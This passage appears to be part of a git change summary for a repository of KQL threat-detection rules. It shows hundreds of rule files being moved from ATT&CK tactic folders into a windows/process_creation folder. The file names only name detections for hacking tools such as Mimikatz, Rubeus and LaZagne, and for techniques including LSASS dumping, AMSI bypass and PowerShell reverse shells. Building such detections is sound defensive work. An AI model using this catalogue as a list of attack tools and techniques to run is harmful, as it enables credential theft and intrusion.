windows/process_creation}/filter_driver_unloaded_via_fltmc_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/findstr_gpp_passwords.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/findstr_launching_lnk_file.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/finger_exe_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/firewall_configuration_discovery_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/firewall_disabled_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/firewall_rule_deleted_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/firewall_rule_update_via_netsh_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/forfiles_command_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/forfiles_exe_child_process_masquerading.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/fsutil_drive_enumeration.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/fsutil_suspicious_invocation.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/gpresult_display_group_policy_information.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/gpscript_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/greedy_file_deletion_using_del.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/group_membership_reconnaissance_via_whoami_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/gzip_archive_decode_via_powershell.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/hacktool_adcspwn_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_bloodhound_sharphound_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_certify_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_certipy_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_covenant_powershell_launcher.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_crackmapexec_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_crackmapexec_execution_patterns.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_crackmapexec_powershell_obfuscation.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_crackmapexec_process_patterns.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_default_powersploit_empire_scheduled_task_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_dinjector_powershell_cradle_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_dumpert_process_dumper_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_edrsilencer_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_empire_powershell_launch_parameters.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_empire_powershell_uac_bypass.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_execution_pe_metadata.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_f_secure_c3_load_by_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_gmer_rootkit_detector_and_remover_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_hashcat_password_cracker_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_hollowreaper_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/hacktool_htran_natbypass_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_hydra_password_bruteforce_execution.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/hacktool_impacket_tools_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_impersonate_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_inveigh_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_jlaive_in_memory_assembly_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_koadic_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_krbrelay_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_krbrelayup_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_lazagne_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_mimikatz_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_pchunter_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_potential_impacket_lateral_movement_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_powertool_execution.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/hacktool_purplesharp_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_pypykatz_credentials_dumping_activity.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_quarks_pwdump_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_redmimicry_winnti_playbook_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_remotekrbrelay_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_rubeus_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_safetykatz_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_securityxploded_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/hacktool_sharpchisel_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_sharpdpapi_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_sharpersist_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_sharpevtmute_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_sharpimpersonation_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_sharpldapmonitor_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_sharpldapwhoami_execution.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/hacktool_sharpmove_tool_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/hacktool_sharpup_privesc_tool_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_sharpview_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_sharpwsus_wsuspendu_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/hacktool_silenttrinity_stager_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_sliver_c2_implant_activity_pattern.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_soaphound_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_stracciatella_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_trufflesnout_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_winpeas_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_winpwn_execution.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/hacktool_winrm_access_via_evil_winrm.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_wmiexec_default_powershell_command.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_xordump_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hardware_model_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/harvesting_of_wifi_credentials_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hh_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hidden_powershell_in_link_file_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hiding_files_with_attrib_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hiding_user_account_via_specialaccounts_registry_key_commandline.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/html_help_hh_exe_suspicious_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/iis_native_code_module_command_line_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/iis_webserver_log_deletion_via_commandline_utilities.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/imagingdevices_unusual_parent_child_processes.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/import_ldap_data_interchange_format_file_via_ldifde_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/import_powershell_modules_from_suspicious_directories_proccreation.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/imports_registry_key_from_a_file.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/imports_registry_key_from_an_ads.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/indirect_command_execution_by_program_compatibility_wizard.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/indirect_command_execution_from_script_file_via_bash_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/indirect_inline_command_execution_via_bash_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/infdefaultinstall_exe_inf_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/insecure_proxy_doh_transfer_via_curl_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/insecure_transfer_via_curl_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/insensitive_subfolder_search_via_findstr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/install_new_package_via_winget_local_manifest.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/installation_of_wsl_kali_linux.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/interactive_at_job.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/interesting_service_enumeration_via_sc_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_clip_launcher.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_compress_obfuscation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_obfuscated_iex_invocation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_stdin_launcher.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_var_launcher.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_var_launcher_obfuscation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_via_stdin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_via_use_clip.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_via_use_mshta.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/java_running_with_remote_debugging.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/jscript_compiler_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/kavremover_dropped_binary_lolbin_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/kernel_memory_dump_via_livekd.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/launch_vsdevshell_ps1_proxy_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/loaded_module_enumeration_via_tasklist_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/local_accounts_discovery.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/local_file_read_using_curl_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/local_groups_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/logged_on_user_password_change_via_ksetup_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/lol_binary_copied_from_system_directory.kql (85%) rename KQL/rules/{Exfiltration => windows/process_creation}/lolbas_data_exfiltration_by_datasvcutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/lolbin_runexehelper_use_as_proxy.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/lolbin_unregmp2_exe_use_as_proxy.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/lsa_ppl_protection_disabled_via_reg_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/lsass_dump_keyword_in_commandline.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/lsass_process_reconnaissance_via_findstr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/malicious_base64_encoded_powershell_keywords_in_command_lines.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/malicious_powershell_commandlets_processcreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/malicious_windows_script_components_file_execution_by_taef_detection.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/mavinject_inject_dll_into_running_process.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/microsoft_iis_connection_strings_decryption.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/microsoft_iis_service_account_password_dumped.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/mmc20_lateral_movement.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/mmc_spawning_windows_shell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/modify_group_policy_settings.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/monitoring_for_persistence_via_bits.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/msdt_execution_via_answer_file.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/msexchange_transport_agent_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/mshta_execution_with_suspicious_file_extensions.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/mshtml_dll_runhtmlapplication_suspicious_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/msiexec_quiet_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/msiexec_web_install.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/mstsc_exe_execution_from_uncommon_parent.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/mstsc_exe_execution_with_local_rdp_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/msxsl_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/net_webclient_casing_anomalies.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/netsh_allow_group_policy_on_microsoft_defender_firewall.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/network_reconnaissance_activity.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/new_activescripteventconsumer_created_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_capture_session_launched_via_dxcap_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_dll_registered_via_odbcconf_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_firewall_rule_added_via_netsh_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/new_generic_credentials_added_via_cmdkey_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_kernel_driver_via_sc_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/new_network_trace_capture_started_via_netsh_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/new_port_forwarding_rule_added_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_process_created_via_taskmgr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/new_process_created_via_wmic_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/new_remote_desktop_connection_initiated_via_mstsc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_root_certificate_installed_via_certmgr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_root_certificate_installed_via_certutil_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_service_creation_using_powershell.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_service_creation_using_sc_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_user_created_via_net_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_user_created_via_net_exe_with_never_expire_option.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/nltest_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/node_process_executions.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/nodejs_execution_of_javascript_file.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/non_interactive_powershell_process_spawned.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/non_privileged_usage_of_reg_or_powershell.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/notepad_password_files_discovery.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/nslookup_powershell_download_cradle_processcreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/ntdllpipe_like_activity_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/obfuscated_ip_download_activity.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/obfuscated_ip_via_cli.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/obfuscated_powershell_oneliner_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/odbcconf_exe_suspicious_dll_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/onenote_exe_execution_of_malicious_embedded_scripts.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/openwith_exe_executes_specified_binary.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/operator_bloopers_cobalt_strike_commands.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/operator_bloopers_cobalt_strike_modules.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/outlook_enableunsafeclientmailrules_setting_enabled.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/password_provided_in_command_line_of_net_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/password_set_to_never_expire_via_wmi.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pdq_deploy_remote_adminstartion_tool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/perl_inline_command_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/permission_check_via_accesschk_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/permission_misconfiguration_reconnaissance_via_findstr_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/persistence_via_sticky_key_backdoor.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/persistence_via_typedpaths_commandline.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/phishing_pattern_iso_in_archive.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/php_inline_command_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/ping_hex_ip.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pktmon_exe_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/port_forwarding_activity_via_ssh_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/portable_gpg_exe_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/possible_privilege_escalation_via_weak_service_permissions.kql (100%) rename KQL/rules/{Reconnaissance => windows/process_creation}/potential_active_directory_enumeration_using_ad_module_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_adplus_exe_abuse.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_amazon_ssm_agent_hijacking.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_amsi_bypass_using_null_bits.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_amsi_bypass_via_net_reflection.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_application_whitelisting_bypass_via_dnx_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_arbitrary_code_execution_via_node_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_arbitrary_command_execution_using_msdt_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_arbitrary_command_execution_via_ftp_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_arbitrary_dll_load_using_winword.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_arbitrary_file_download_using_office_application.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_arbitrary_file_download_via_cmdl32_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_binary_impersonating_sysinternals_tools.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_binary_proxy_execution_via_cdb_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_browser_data_stealing.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_cobaltstrike_process_patterns.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_com_objects_download_cradles_usage_process_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_command_line_path_traversal_evasion_attempt.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_commandline_obfuscation_using_escape_characters.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_commandline_path_traversal_via_cmd_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_configuration_and_service_reconnaissance_via_reg_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_cookies_session_hijacking.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_credential_dumping_via_lsass_process_clone.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_credential_dumping_via_wer.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/potential_crypto_mining_activity.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_data_exfiltration_activity_via_commandline_tools.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_data_stealing_via_chromium_headless_debugging.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_via_binary_rename.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_defense_evasion_via_right_to_left_override.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_discovery_activity_via_dnscmd_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_dll_file_download_via_powershell_invoke_webrequest.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_dll_injection_or_execution_using_tracker_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_dll_injection_via_acccheckconsole.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_dll_sideloading_via_deviceenroller_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_dosfuscation_activity.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_download_upload_activity_using_type_command.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_dropper_script_execution_via_wscript_cscript.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_encoded_powershell_patterns_in_commandline.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/potential_execution_of_sysinternals_tools.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_fake_instance_of_hxtsr_exe_executed.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_file_download_via_ms_appinstaller_protocol_handler.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/potential_file_overwrite_via_sysinternals_sdelete.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_homoglyph_attack_using_lookalike_characters.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_lateral_movement_via_windows_remote_shell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_lethalhta_technique_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_lsass_process_dump_via_procdump.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_manage_bde_wsf_abuse_to_proxy_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_memory_dumping_activity_via_livekd.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_meterpreter_cobaltstrike_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_mftrace_exe_abuse.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_mpclient_dll_sideloading_via_defender_binaries.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_msiexec_masquerading.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_mstsc_shadowing_activity.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_network_sniffing_activity_using_network_tools.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_ntlm_coercion_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_obfuscated_ordinal_call_via_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_password_spraying_attempt_using_dsacls_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_attempt_via_existing_service_tampering.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_attempt_via_run_keys_using_reg_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_via_logon_scripts_commandline.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_via_microsoft_compatibility_appraiser.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_via_netsh_helper_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_persistence_via_powershell_search_order_hijacking_task.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_powershell_command_line_obfuscation.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_powershell_console_history_access_attempt_via_history_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_downgrade_attack.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_execution_policy_tampering_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_execution_via_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_powershell_obfuscation_via_reversed_commands.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_powershell_obfuscation_via_wchar_char.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_powershell_reverseshell_connection.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/potential_privilege_escalation_to_local_system.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_privilege_escalation_via_service_permissions_weakness.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_process_execution_proxy_via_cl_invocation_ps1.kql (100%) rename KQL/rules/{Privilege Escalation => 